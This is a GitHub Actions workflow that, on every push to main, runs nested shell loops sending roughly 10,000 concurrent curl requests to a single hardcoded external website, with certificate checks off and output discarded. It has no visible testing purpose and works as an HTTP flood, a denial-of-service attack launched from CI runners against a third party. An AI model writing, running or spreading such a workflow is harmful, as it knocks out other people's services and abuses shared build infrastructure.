name: Loop 100 Times ecf0564b-f6dc-449c-a5b7-844281e09068

on:
  push:
    branches:
      - main

jobs:
  loop_job:
    runs-on: ubuntu-latest
    steps:
      - name: Run loop 100 times ecf0564b-f6dc-449c-a5b7-844281e09068
        id: loop_step
        run: |
          counter=0
          max_loops=100
          target="https://v6.zero.bs/"
          while [ $counter -lt 100 ]; do
            echo "Running loop iteration $((counter + 1))..."
            curl_loop=0
            while [ $curl_loop -lt $max_loops ]; do
              curl -ks "$target" 2>&1 > /dev/null &
              curl_loop=$((curl_loop + 1))
            done
            echo " [+] started $max_loops processes "
            curl -ks "$target" 2>&1 > /dev/null
            
            counter=$((counter + 1))
          done
          echo ">> DONE!"




